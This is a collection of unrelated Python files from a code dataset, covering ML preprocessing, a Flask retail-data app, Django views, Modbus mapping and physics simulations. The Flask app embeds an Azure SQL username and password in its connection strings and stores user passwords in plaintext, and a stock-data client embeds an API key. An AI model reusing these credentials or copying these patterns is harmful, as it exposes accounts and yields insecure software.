np.argsort(l)\r\nprint(l_sort_arg)\r\nprint(l[l_sort_arg[0]])\r\nprint(len(df.columns))\r\n\r\nfor i in range(len(df.columns)):\r\n print('Feature ',(df.columns[l_sort_arg[i]]), ': ', l[l_sort_arg[i]])\r\n\r\nd1 = df[['X3_c', 'X3_f', 'X3_a', 'X3_d', 'X3_g',\r\n 'X3_e', 'X3_b', 'X4_d', 'X4_a', 'X4_b', 'X4_c']]\r\ndata = pd.concat([d1, y])\r\nprint(data.shape)\r\ncorre_m = data.corr()\r\nsns.heatmap(corre_m, annot=True)\r\nplt.show()\r\n\r\n","sub_path":"ML Concepts/One_Hot_Encoding_with_Many_variables.py","file_name":"One_Hot_Encoding_with_Many_variables.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"376679262","text":"import numpy as np\n\nclass DataLoader:\n\n def __init__(self, classes, text_to_vector, max_length):\n self.text_to_vector = text_to_vector\n self.max_length = max_length\n self.classes = []\n self.class_to_id = dict()\n for i, c in enumerate(classes):\n self.class_to_id[c] = i\n\n def get_batch(self, path, batch_size):\n x = []\n y = []\n while 1:\n f = open(path, \"r\", encoding=\"utf-8\")\n for line in f:\n if 
len(x) < batch_size:\n self._parse_line(line, x, y)\n else:\n yield np.array(x), np.array(y)\n x = []\n y = []\n f.close()\n\n def load(self, path, max_size=None):\n x = []\n y = []\n with open(path, \"r\", encoding=\"utf-8\") as f:\n for i, line in enumerate(f):\n if max_size and i > max_size:\n break\n else:\n self._parse_line(line, x, y)\n return np.array(x), np.array(y)\n\n def embed(self, text):\n return self._generalize_length(self.text_to_vector(text))\n\n def _parse_line(self, line, x, y):\n strs = line.split('\\t')\n label = strs[0]\n text = strs[1]\n if label in self.class_to_id:\n y.append(self.class_to_id[label])\n vec_x = self.embed(text)\n x.append(vec_x)\n\n def _generalize_length(self, l):\n if len(l) > self.max_length:\n l = l[:self.max_length]\n else:\n l.extend([0]*(self.max_length-len(l)))\n return l","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"5950997","text":"# https://www.hackerrank.com/challenges/re-split/problem\nregex_pattern = r\"[.,]\"\t# Do not delete 'r'.\n\nimport re\nprint(\"\\n\".join(re.split(regex_pattern, input())))\n\n\n# Case that handles two consecutive delimiters \nr\"\"\"\nimport re\nprint(*filter(None, re.split(r'[.,]+', input())), sep='\\n')\nfilter() returns every element in the second argument for which the function in the first argument evaluates as true.\n Using None as the first argument removes all items that are equivalent to false. The latter two test cases have \n consecutive delimiters, so using re.split() creates empty elements in the list. filter() returns the list without those \n empty elements.\n\"\"\"","sub_path":"HackerRank/PythonChallenges/re_split.py","file_name":"re_split.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"59539651","text":"import codecs\r\n\r\nimport flask\r\nfrom flask import Flask, render_template,request\r\nimport pyodbc\r\nimport csv\r\n\r\n\r\napp = flask.Flask(__name__)\r\napp.config[\"DEBUG\"] = True\r\n\r\n\r\n@app.route('/')\r\ndef login():\r\n return render_template(\"login.html\")\r\n\r\n@app.route('/dashboard')\r\ndef tableaudashboard():\r\n return render_template(\"tableau.html\")\r\n\r\n@app.route('/register')\r\ndef register():\r\n return render_template(\"register.html\")\r\n\r\n@app.route('/loginValidation',methods=['POST'])\r\ndef login_validation():\r\n error=None\r\n conn = pyodbc.connect(\r\n 'DRIVER={SQL Server};SERVER=tcp:azurecloudassign.database.windows.net,1433;DATABASE=azurecloud;UID=azureadmin;PWD=Admin@123;')\r\n cursor = conn.cursor()\r\n username=request.form['Uname']\r\n password=request.form['Pass']\r\n cursor.execute(\"\"\"SELECT * FROM azurecloud.dbo.user_details where user_name = ? and password = ? 
\"\"\",[username,password])\r\n usersss=cursor.fetchone()\r\n conn.commit()\r\n if usersss != None :\r\n sql_select_query = \"select h.hshd_num, t.basket_num,t.product_num,t.purchase,p.department,p.commodity,t.spend,t.units,t.store_r,t.week_num,t.year,h.L,h.age_range,h.marital,h.income_range,h.homeowner,h.hshd_composition,h.hh_size,h.children from households as h,transactions as t , products as p where h.hshd_num=t.hshd_num and t.product_num=p.product_num and h.hshd_num=10\"\r\n cursor.execute(sql_select_query)\r\n data = cursor.fetchall()\r\n conn.close()\r\n return render_template(\"homepage.html\", hshddata=data)\r\n else:\r\n error=\"Incorrect username or password\"\r\n return render_template('login.html',error=error)\r\n\r\n@app.route('/addUser',methods=['POST'])\r\ndef add_user():\r\n msg=\"Registered Sucessfully. Please login to continue\"\r\n conn = pyodbc.connect(\r\n 'DRIVER={SQL Server};SERVER=tcp:azurecloudassign.database.windows.net,1433;DATABASE=azurecloud;UID=azureadmin;PWD=Admin@123;')\r\n c = conn.cursor()\r\n fnameu=request.form['Fname']\r\n lnameu=request.form['Lname']\r\n emailu=request.form['email']\r\n usernameu=request.form['username']\r\n pswu=request.form['Pass']\r\n c.execute(\"\"\"SELECT * FROM azurecloud.dbo.user_details WHERE user_name=? \"\"\",(usernameu,))\r\n users=c.fetchone()\r\n if users==None:\r\n c.execute(\"\"\"INSERT INTO azurecloud.dbo.user_details (first_name,last_name,email,user_name,password) VALUES (?,?,?,?,?)\"\"\",(fnameu,lnameu,emailu,usernameu,pswu))\r\n conn.commit()\r\n conn.close()\r\n msg=\"Registration Successful!\"\r\n return render_template(\"login.html\",msg=msg)\r\n else:\r\n error=\"Username already exists. Please try with different Username\"\r\n conn.close()\r\n return render_template(\"register.html\",error=error)\r\n\r\n\r\n@app.route('/getrows', methods=['GET','POST'])\r\ndef getRows():\r\n hhnum=request.args.get('search')\r\n # hhnum=request.form['search']\r\n print(hhnum)\r\n conn = pyodbc.connect(\r\n 'DRIVER={SQL Server};SERVER=tcp:azurecloudassign.database.windows.net,1433;DATABASE=azurecloud;UID=azureadmin;PWD=Admin@123;')\r\n cursor = conn.cursor()\r\n\r\n #sql_select_query = \"select h.hshd_num, t.basket_num,t.product_num,t.purchase,p.department,p.commodity,t.spend,t.units,t.store_r,t.week_num,t.year,h.L,h.age_range,h.marital,h.income_range,h.homeowner,h.hshd_composition,h.hh_size,h.children from households as h,transactions as t , products as p where h.hshd_num=t.hshd_num and t.product_num=p.product_num and h.hshd_num=?\"\r\n cursor.execute(\"\"\"select h.hshd_num, t.basket_num,t.product_num,t.purchase,p.department,p.commodity,t.spend,t.units,t.store_r,t.week_num,t.year,h.L,h.age_range,h.marital,h.income_range,h.homeowner,h.hshd_composition,h.hh_size,h.children from households as h,transactions as t , products as p where h.hshd_num=t.hshd_num and t.product_num=p.product_num and h.hshd_num=?\"\"\",(hhnum,))\r\n data=cursor.fetchall()\r\n conn.close()\r\n return render_template(\"homepage.html\",hshddata=data)\r\n\r\ndef decode_utf8(input_iterator):\r\n for l in input_iterator:\r\n yield l.decode('utf-8')\r\n\r\n@app.route('/insertdata', methods=['GET', 'POST'])\r\ndef insertCSVData():\r\n tablename= None\r\n errmsg=None\r\n fileName = request.files['file']\r\n conn = pyodbc.connect(\r\n 'DRIVER={SQL Server};SERVER=tcp:azurecloudassign.database.windows.net,1433;DATABASE=azurecloud;UID=azureadmin;PWD=Admin@123;')\r\n cursor = conn.cursor()\r\n reader = csv.reader(codecs.iterdecode(request.files['file'], 'utf-8'))\r\n 
next(reader)\r\n for row in reader:\r\n if 'products' in fileName.filename:\r\n tablename='PRODUCTS'\r\n cursor.execute('INSERT INTO azurecloud.dbo.products(PRODUCT_NUM, DEPARTMENT, COMMODITY,BRAND_TY,NATURAL_ORGANIC_FLAG) VALUES(?,?,?,?,?)',row)\r\n elif 'households' in fileName.filename:\r\n tablename='HOUSEHOLDS'\r\n cursor.execute('INSERT INTO azurecloud.dbo.households(HSHD_NUM,L,AGE_RANGE,MARITAL,INCOME_RANGE,HOMEOWNER,HSHD_COMPOSITION,HH_SIZE,CHILDREN) VALUES(?,?,?,?,?,?,?,?,?)',row)\r\n elif 'transactions' in fileName.filename:\r\n tablename='TRANSACTIONS'\r\n cursor.execute('INSERT INTO azurecloud.dbo.transactions(BASKET_NUM,HSHD_NUM,PURCHASE,PRODUCT_NUM,SPEND,UNITS,STORE_R,WEEK_NUM,YEAR) VALUES(?,?,?,?,?,?,?,?,?)',row)\r\n else:\r\n errmsg=\"Incorrect file provided. Allowed filenames households.csv or transactions.csv or products.csv\"\r\n conn.commit()\r\n sql_select_query = \"select h.hshd_num, t.basket_num,t.product_num,t.purchase,p.department,p.commodity,t.spend,t.units,t.store_r,t.week_num,t.year,h.L,h.age_range,h.marital,h.income_range,h.homeowner,h.hshd_composition,h.hh_size,h.children from households as h,transactions as t , products as p where h.hshd_num=t.hshd_num and t.product_num=p.product_num and h.hshd_num=10\"\r\n cursor.execute(sql_select_query)\r\n data = cursor.fetchall()\r\n insert_msg=\"Data is inserted successfully in the table\"\r\n conn.close()\r\n if errmsg==None:\r\n return render_template(\"homepage.html\", hshddata=data,insertmsg=insert_msg,tablename=tablename)\r\n else:\r\n return render_template(\"homepage.html\",hshddata=data,errmsg=errmsg)\r\n\r\n\r\n #return render_template('homepage.html')\r\n\r\napp.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"575085698","text":"import requests\nimport pandas as pd\n\n\nclass AlphaVantage:\n\n def __init__(self, symbol_code, interval=\"60min\", outputsize=\"compact\"):\n self.base_url = \"https://www.alphavantage.co\"\n self.default_endpoint = \"/query\"\n self.api_key = \"IE7F2G4JU0O4YP0Y\"\n self.symbol_code = symbol_code\n self.interval = interval\n self.outputsize = outputsize\n\n def intraday(self):\n parameters = {\n \"function\": \"TIME_SERIES_INTRADAY\",\n \"symbol\": self.symbol_code,\n \"interval\": self.interval,\n \"outputsize\": self.outputsize,\n \"datatype\": \"json\",\n \"apikey\": self.api_key\n }\n\n response_intraday = requests.get(\"{0}{1}\".format(self.base_url, self.default_endpoint), params=parameters, stream=True).json()\n\n return response_intraday\n\n def daily(self):\n parameters = {\n \"function\": \"TIME_SERIES_DAILY\",\n \"symbol\": self.symbol_code,\n \"outputsize\": self.outputsize,\n \"datatype\": \"json\",\n \"apikey\": self.api_key\n }\n\n response_daily = requests.get(\"{0}{1}\".format(self.base_url, self.default_endpoint), params=parameters, stream=True).json()\n\n return response_daily","sub_path":"get_historical_data.py","file_name":"get_historical_data.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"389233999","text":"# -*- coding: utf-8 -*-\n# @Time : 6/27/2021 4:36 PM\n# @Author : Paulo Radatz\n# @Email : pradatz@epri.com\n# @File : test_dsselement.py\n# @Software: PyCharm\n\nimport pytest\n\n\nclass TestBus13DSSElement:\n\n @pytest.fixture(autouse=True)\n def _request(self, solve_snap_13bus):\n self.dss = solve_snap_13bus\n 
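# activate the element under test so every check below queries Line.671692\n        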
self.dss.circuit_set_active_element('Line.671692')\n\n def test_dsselement_num_properties(self):\n expected = 38\n actual = self.dss.dsselement_num_properties()\n assert actual == expected\n\n def test_dsselement_name(self):\n expected = \"Line.671692\"\n actual = self.dss.dsselement_name()\n assert actual == expected\n\n def test_dsselement_all_property_names(self):\n expected = ['bus1', 'bus2', 'linecode', 'length', 'phases', 'r1', 'x1', 'r0', 'x0', 'C1', 'C0', 'rmatrix',\n 'xmatrix', 'cmatrix', 'Switch', 'Rg', 'Xg', 'rho', 'geometry', 'units', 'spacing', 'wires',\n 'EarthModel', 'cncables', 'tscables', 'B1', 'B0', 'Seasons', 'Ratings', 'LineType', 'normamps',\n 'emergamps', 'faultrate', 'pctperm', 'repair', 'basefreq', 'enabled', 'like']\n actual = self.dss.dsselement_all_property_names()\n assert actual == expected\n","sub_path":"tests/py_dss_interface/test_dsselement.py","file_name":"test_dsselement.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"262293755","text":"from django.contrib import admin\nfrom django.urls import path, include\n\n\nurlpatterns = [\n path('api/api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('admin/', admin.site.urls),\n path('tinymce/', include('tinymce.urls')),\n path('api/v1/', include('main.urls')),\n]\n","sub_path":"appengine/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"135953179","text":"\"\"\"\nConverter for Modbus Mapping\n\"\"\"\n############\n# Standard #\n############\nimport logging\n###############\n# Third Party #\n###############\nimport pandas\nimport numpy as np\n##########\n# Module #\n##########\n\nlogger = logging.getLogger(__name__)\n\n\nclass Converter(object):\n \"\"\"\n Class to convert an Excel file to a complete EPICS modbus mapping\n\n Parameters\n ----------\n handle : str or file-like object\n Path or file-like object containing Modbus mapping\n\n sheet : str, optional\n Name of sheet to read, otherwise the first is used\n\n Attributes\n ----------\n mapping : :class:`.pandas.DataFrame`\n DataFrame representation of mapping\n \"\"\"\n def __init__(self, handle, **kwargs):\n #Save spreasheet information\n self.handle = handle\n self.sheet = kwargs.get('sheet', None)\n #Load Modbus CSV\n self.reload(handle=handle, sheet=kwargs.get('sheet', 0))\n\n\n def reload(self, **kwargs):\n \"\"\"\n Reload the CSV description\n\n Parameters\n ----------\n handle : str or file-like object, optional\n Use a new handle, otherwise the cached handle is used\n\n sheet : str, optional\n Name of sheet to read, otherwise the first is used\n\n Returns\n -------\n mapping : :class:`.pandas.DataFrame`\n DataFrame representation of the map\n \"\"\"\n #Reset handle and sheet if given\n self.handle = kwargs.get('handle', self.handle)\n self.sheet = kwargs.get('sheet', self.sheet)\n\n #Read output\n try:\n self.handle.seek(0)\n self.mapping = pandas.read_excel(self.handle, sheetname=self.sheet,\n index_col=False, header=0)\n except:\n logger.debug(\"Unable to parse as an Excel file, attempting CSV\")\n self.handle.seek(0)\n self.mapping = pandas.read_csv(self.handle, sep=',',\n header=0, index_col=False)\n\n return self.mapping\n\n\n def create_substitutions(self, handle, template,\n start=0, spacing=',\\t'):\n \"\"\"\n Create a substitutions file from the current mapping\n\n Parameters\n ----------\n 
handle : file-like object\n Output of modbus map\n\n template : :class:`.Template`\n Template object to parse\n\n start : int\n Starting offset of the substitution mapping\n\n spacing : str\n Spacing between columns in the substitutions pattern\n \"\"\"\n #Create a temporary mapping\n df = self.mapping.copy()\n\n #Add offset\n df[template.memory_field] = np.arange(\n start,\n template.memory_size*len(df)+start,\n template.memory_size)\n #Check all keys are accounted\n for key in template.required_fields:\n if key not in df.columns:\n raise KeyError(\"Mapping has no column corresponding to {}\"\n \"\".format(key))\n\n #Replace defaults\n for key, default in template.defaults.items():\n #Add column if not present\n if key not in df.columns:\n df[key] = [default]*len(df)\n #Otherwise only replace missing\n else:\n df[key].replace(np.nan, default, inplace=True)\n\n #Replace all missing information with empty strings \n df.replace(np.nan, '', inplace=True)\n\n #Header for substitutions\n handle.write('file \"%s\" {pattern\\n' % template.fname)\n handle.write('{%s}\\n' % spacing.join(template.header))\n #Iterate through rows\n for row, info in df.iterrows():\n dec = spacing.join(['\"%s\"' % info[key]\n for key in template.header])\n handle.write('{%s}\\n' % dec)\n #Close substitution\n handle.write('}\\n')\n\n\n def create_coils(self, handle, coil, template,\n plc_var='VAR', start=0):\n \"\"\"\n Create a Modbus mapping of the PLC coils\n\n Parameters\n ----------\n handle : file-like object\n Destination for mapping\n\n coil : str\n Name of the coil variable\n\n template : :class:`.Template`\n Template of record type\n\n plc_var : str, optional\n Name of column containing PLC variable name\n\n start : int, optional\n Starting point in memory for mapping\n \"\"\"\n if plc_var not in self.mapping.columns:\n raise ValueError(\"Invalid column {} for PLC variable\"\n \"\".format(plc_var))\n #Create a copy of mapping\n df = self.mapping.copy()\n \n #Add memory address \n df['loc'] = np.arange(start,\n template.memory_size*len(df)+start,\n template.memory_size)\n\n #Add information to file\n for row, info in df.iterrows():\n handle.write(template.declare_in_memory(coil,\n info[plc_var],\n info['loc']))\n","sub_path":"pymod/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"183105547","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\n\n#%% Test functions\n\ndef Himmb(x,y):\n z = ((x**2)+y-11)**2+(x+(y**2)-7)**2\n return(z)\n\ndef sph(x,y):\n z = x**2+y**2\n return(z)\n\ndef McCor(x,y): #-1.5 < x < 4, -3 < y < 4\n z = np.sin(x+y)+(x-y)**(2) -(1.5*x)+(2.5*y)+1\n return(z)\n\ndef Beale(x,y):\n z = (1.5-x+x*y)**2+(2.25-x+x*y**2)**2+(2.625-x+x*y**3)**2\n return(z)\n \ndef GoldP(x,y):\n z = (1+(x+y+1)**(2)*(19-14*x+3*x**2-14*y+6*x*y+3*y**2))*(30+(2*x-3*y)**2 *\n (18-32*x+12*x**2+48*y-36*x*y+27*y**2))\n return(z)\n \ndef Schaffer2(x,y):\n z = 0.5 + (((np.sin(x**2-y**2))**2)-0.5)/((1 +0.001*(x**2+y**2))**2)\n return(z)\n\ndef Levi(x,y):\n z = (np.sin(3*np.pi*x))**2+((x-1)**2)*(1+(np.sin(3*np.pi*y))**2)+((y-1)**2)*(1+(np.sin(2*np.pi*y))**2)\n return(z)\n \n#%% Plotting test functions\ndef PlotFun(f,fx=0,fy=0,fz=-1):\n print(\"Function\", f.__name__)\n x, y = np.linspace(-10, 10, 30), np.linspace(-10, 10, 30)\n X, Y = np.meshgrid(x, y)\n Z = f(X, Y)\n figi = plt.figure()\n ax = plt.axes(projection='3d')\n ax.plot_surface(X, Y, Z, 
rstride=1, cstride=1, cmap='rainbow', edgecolor='none')\n ax.set_title(f.__name__)\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n ax.view_init(60, 35)\n #plot results\n solution_found = ax.plot([fx], [fy], [fz], markerfacecolor='y', markeredgecolor='g',\n marker='o', markersize=5, alpha=1.0)\n fx,fy,fz=round(fx,2), round(fy,2), round(fz,2)\n coord=[(fx,fy,fz)]\n \n print(coord)\n ax.legend(solution_found, ['Solution \\n %s ' %coord], numpoints=1, loc='upper left')\n \n\n#%%\n #print(Beale(-0.19,5.68))\n","sub_path":"Sim_Annealing/TestFunctions.py","file_name":"TestFunctions.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"609913913","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\n#-------------------------------------------------------------------------------------------------------------------------------\n# By Alexandra Lee (July 2018) \n#\n# Generate input files\n#\n# Dataset: Pseudomonas aeruginosa gene expression compendium referenced in https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5069748/\n# \n# Use map_file to group samples into phenotype groups (condition A and B) based on experimental design annotations\n# Example: control vs treatment with antibiotics\n# \n# Then group samples into training and test sets\n#\n# Generate offset vector using gene expression data in the original space (train_offset_original):\n# average gene expression for condition A - average gene expression for condition B using all genes/dimensions\n#-------------------------------------------------------------------------------------------------------------------------------\nimport os\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import variation\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nrandomState = 123\nfrom numpy.random import seed\nseed(randomState)\n\n\n# In[3]:\n\n\n# load arguments\ndata_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"all-pseudomonas-gene-normalized.zip\")\nmap_file = os.path.join(os.path.dirname(os.getcwd()), \"metadata\", \"mapping_cipro.txt\")\n\n# output files\nfig_file = os.path.join(os.path.dirname(os.getcwd()), \"viz\", \"cipro_treatment\", \"cv.png\")\ntrain_control_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\", \"train_control.txt\")\ntrain_treat_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\", \"train_treat.txt\")\ntest_control_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\",\"test_control.txt\")\ntest_treat_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\", \"test_treat.txt\")\ntrain_input_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\", \"train_model_input.txt.xz\")\noriginal_offset_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"cipro_treatment\", \"train_offset_original.txt\")\n\n\n# In[4]:\n\n\n# read in data\ndata = pd.read_table(data_file, header = 0, sep = '\\t', index_col = 0, compression='zip')\nX = data.transpose()\nX.head(5)\n\n\n# In[5]:\n\n\n# read in metadata file containing grouping of each sample into training/test and phenotypic group\ngrp = pd.read_table(map_file, header=0, sep='\\t', index_col=None)\ngrp\n\n\n# In[6]:\n\n\n# Group samples into condition A and B based on mapping file provided\ncontrol_all = pd.DataFrame()\ntreat_all = pd.DataFrame()\n\nfor index, row in 
grp.iterrows():\n    if row['Group'] == 'control':\n        sample = str(row['Sample ID'])\n        control_all = control_all.append(X[X.index.str.contains(sample, regex=False)])\n        #print('Training group A {}'.format(sample))\n    else:\n        sample = str(row['Sample ID'])\n        treat_all = treat_all.append(X[X.index.str.contains(sample, regex=False)])\n        #print('Training group B {}'.format(sample))\n\n# Split off a 20% test set randomly\ntest_set_percent = 0.2\ntest_control = control_all.sample(frac=test_set_percent, random_state = randomState)\ntrain_control = control_all.drop(test_control.index)\n\ntest_treat = treat_all.sample(frac=test_set_percent, random_state = randomState)\ntrain_treat = treat_all.drop(test_treat.index)\n\n#control_all\ntrain_treat\n#test_treat\n\n\n# In[7]:\n\n\n# Calculate the Coefficient of Variation (CV) to determine variance between samples\n# CV is the standardized measure of dispersion from the mean\ntreat_cv = variation(treat_all, axis = 0)\ntreat_cv = pd.DataFrame(treat_cv, columns = ['cv_treat'])\ntreat_cv.insert(0, 'gene_id', treat_all.columns)\n\ncontrol_cv = variation(control_all, axis = 0)\ncontrol_cv = pd.DataFrame(control_cv, columns = ['cv_control'])\ncontrol_cv.insert(0, 'gene_id', control_all.columns)\n\n# Join \nCV = pd.merge(treat_cv, control_cv, on = 'gene_id')\nCV = pd.melt(CV, id_vars = 'gene_id', var_name = 'group', value_name = 'cv' )\nCV.head(5)\n\n# figure\nfig = plt.figure()\nfg = sns.boxplot(x = 'group', y='cv', hue='group', data=CV, palette="Set3")\nfig.savefig(fig_file)\n\n\n# In[8]:\n\n\n# Create input holding out the test set\ninput_holdout = X.drop(test_control.index)\ninput_holdout = input_holdout.drop(test_treat.index)\n\ninput_holdout.head(5)\ninput_holdout.shape\n#X.shape\n\n\n# In[9]:\n\n\n# Average gene expression across samples in training set\ntrain_control_mean = train_control.mean(axis=0)\ntrain_treat_mean = train_treat.mean(axis=0)\n\n# Generate offset using average gene expression in original dataset\ntrain_offset_original = train_treat_mean - train_control_mean\ntrain_offset_original_df = pd.Series.to_frame(train_offset_original).transpose()\ntrain_offset_original_df\n\n\n# In[10]:\n\n\n# Output\ntrain_control.to_csv(train_control_file, sep='\\t')\ntrain_treat.to_csv(train_treat_file, sep='\\t')\n\ntest_control.to_csv(test_control_file, sep='\\t')\ntest_treat.to_csv(test_treat_file, sep='\\t')\n\ntrain_offset_original_df.to_csv(original_offset_file, sep='\\t')\n\ninput_holdout.to_csv(train_input_file, sep='\\t', compression='xz')\n\n","sub_path":"exploration/scripts/nbconverted/generate_input_bool.py","file_name":"generate_input_bool.py","file_ext":"py","file_size_in_byte":5128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"544423271","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import *\nfrom django.conf import settings\nfrom .forms import loginForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom Ressources.models import LocalRess,TypeRess\nimport requests\n\ndef authlogin(request):\n    """\n    Validate the authentication form.\n\n    Retrieve the username and password, then check them with the authenticate function.\n\n    If they are valid, log the user in.\n    \n    Returns:\n        Redirects to the login form.\n        If the form is valid, redirects to settings.LOGIN_REDIRECT_URL (set to the refreshRess view).\n    """\n\n    if request.method == 'POST':\n        form = loginForm(request.POST or None)\n        if form.is_valid():\n            username = request.POST.get('username', False)\n            password = request.POST.get('password', False)\n            user = authenticate(request, username=username, password=password)\n            if user is not None and user.is_active:\n                login(request, user)\n                return redirect(settings.LOGIN_REDIRECT_URL)\n    else:\n        form = loginForm()\n\n    return render(request, 'accounts/login.html', {'form' : form})\n\n@login_required\ndef authlogout(request):\n    """\n    Log out the current user; a user must be logged in.\n    \n    Returns:\n        Redirects to the login form.\n    """\n\n    logout(request)\n\n    return redirect('login')\n\ndef refreshRess(request):\n    """\n    Refresh the list of local resources by filling it from every resource Type present.\n\n    For each Type, fetch the JSON file from its endpoint, then for each resource in that Type create a local resource (LocalRess) after checking that it does not already exist.\n\n    Returns:\n        Redirects to the home page\n    """\n    all_type = TypeRess.objects.all()\n    for type in all_type:\n        content = requests.get(type.endpoint)\n        data = content.json()\n        for ress in data:\n            try:\n                unress = LocalRess.objects.get(exid=ress['exid'])\n            except LocalRess.DoesNotExist:\n                unress = LocalRess()\n                unress.type = type\n                unress.exid = ress['exid']\n                unress.save()\n    return redirect('home')\n\n\n\n"""\ndef refreshUser(request):\n    \n    VIEW NOT USED!\n\n    Refresh this Django service's user list via an HTTP request to another service.\n    The request URL is changed through the 'url' variable.\n\n    Returns:\n        Redirects to the list of LABs.\n\n    url = "http://10.29.248.85:8001/api/users/"\n    content = requests.get(url)\n    data = content.json()\n    all_users=[]\n    for user in data:\n        all_users.append((user['username'], user['email'], user['password']))\n\n    for user in all_users:\n        if user[0] != 'root':\n            try:\n                unuser = User.objects.get(username=user[0])\n                #TODO: delete users who have not logged in for some time -> if unuser.last_login < ?\n            except User.DoesNotExist:\n                unuser = User.objects.create_user(user[0], user[1], user[2])\n                unuser.save()\n    return redirect('LAB_liste')\n"""\n\n\n","sub_path":"app_LAB/web/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"602099040","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import datetime\r\nimport cv2\r\nimport glob\r\n\r\nstart = datetime.now()\r\nn = 100 # Number of particles\r\nG = 1000 # Gravitational constant\r\nparticle_size = 1 # Particle size, so that 2 particles cannot come closer than this dist\r\ntime_step = 0.1\r\ntotal_time = 36\r\ntotal_steps = int(total_time/time_step)\r\n\r\nx_lim = 1000\r\ny_lim = 1000\r\n\r\nM = 2 * np.random.uniform(low=0.1, high=1, size=(n,))\r\ns = [50*M[n] for n in range(len(M))]\r\nX = x_lim * np.random.rand(n)\r\nY = y_lim * np.random.rand(n)\r\n\r\nF = np.zeros((n, n))\r\nacc_x = np.zeros((n, n))\r\nacc_y = np.zeros((n, n))\r\ntheta = np.zeros((n, n))\r\nux = np.zeros((n, n))\r\nuy = np.zeros((n, n))\r\nsx = np.zeros((n, n))\r\nsy = np.zeros((n, n))\r\nvx = np.zeros((n, n))\r\nvy = np.zeros((n, n))\r\nXt = np.zeros((n, total_steps))\r\nYt = np.zeros((n, total_steps))\r\ncurrent_pos = np.zeros((n, 
2))\r\n\r\ncurrent_pos[:, 0] = X\r\ncurrent_pos[:, 1] = Y\r\n\r\nprint('\\n### Boundary Conditions ###')\r\nprint('Number of particles:', n)\r\nprint('Particle size:', particle_size)\r\nprint('Gravitational constant:', G)\r\nprint('End time:', total_time)\r\nprint('Time step:', time_step)\r\nprint('Total steps:', total_steps)\r\n\r\nprint('\\nRunning simulation...')\r\nt = 0\r\nstatus = 0\r\n\r\nfor z in range(total_steps):\r\n status = status + 1\r\n p = np.round((status/total_steps)*100, 2)\r\n print('\\r''Progress:', p, '%', end='')\r\n for i in range(n):\r\n for j in range(n):\r\n if i != j:\r\n r = (X[i] - X[j]) ** 2 + (Y[i] - Y[j]) ** 2\r\n r = max(r, (2 * particle_size))\r\n F[i, j] = (G * M[i] * M[j]) / r\r\n\r\n if X[i] - X[j] == 0:\r\n if (Y[i] - Y[j]) < 0:\r\n theta[i, j] = np.pi/2\r\n else:\r\n theta[i, j] = (3*np.pi)/2\r\n elif Y[i] - Y[j] == 0:\r\n if (X[i] - X[j]) < 0:\r\n theta[i, j] = 0\r\n else:\r\n theta[i, j] = np.pi\r\n elif Y[i] - Y[j] == 0 and X[i] - X[j] == 0:\r\n theta = 0\r\n else:\r\n theta[i, j] = np.arctan(abs(Y[i] - Y[j]) / abs(X[i] - X[j]))\r\n if (X[i] - X[j]) < 0:\r\n if (Y[i] - Y[j]) < 0:\r\n theta[i, j] = theta[i, j] # First Quadrant wrt i\r\n else:\r\n theta[i, j] = (2*np.pi) - theta[i, j] # Fourth Quadrant wrt i\r\n else:\r\n if (Y[i] - Y[j]) < 0:\r\n theta[i, j] = np.pi - theta[i, j]\r\n else:\r\n theta[i, j] = np.pi + theta[i, j]\r\n\r\n Fx = np.multiply(F, np.cos(theta))\r\n Fy = np.multiply(F, np.sin(theta))\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n acc_x[i, j] = Fx[i, j]/M[i]\r\n acc_y[i, j] = Fy[i, j] / M[i]\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n sx[i, j] = (ux[i, j] * time_step) + (0.5 * acc_x[i, j] * time_step * time_step)\r\n sy[i, j] 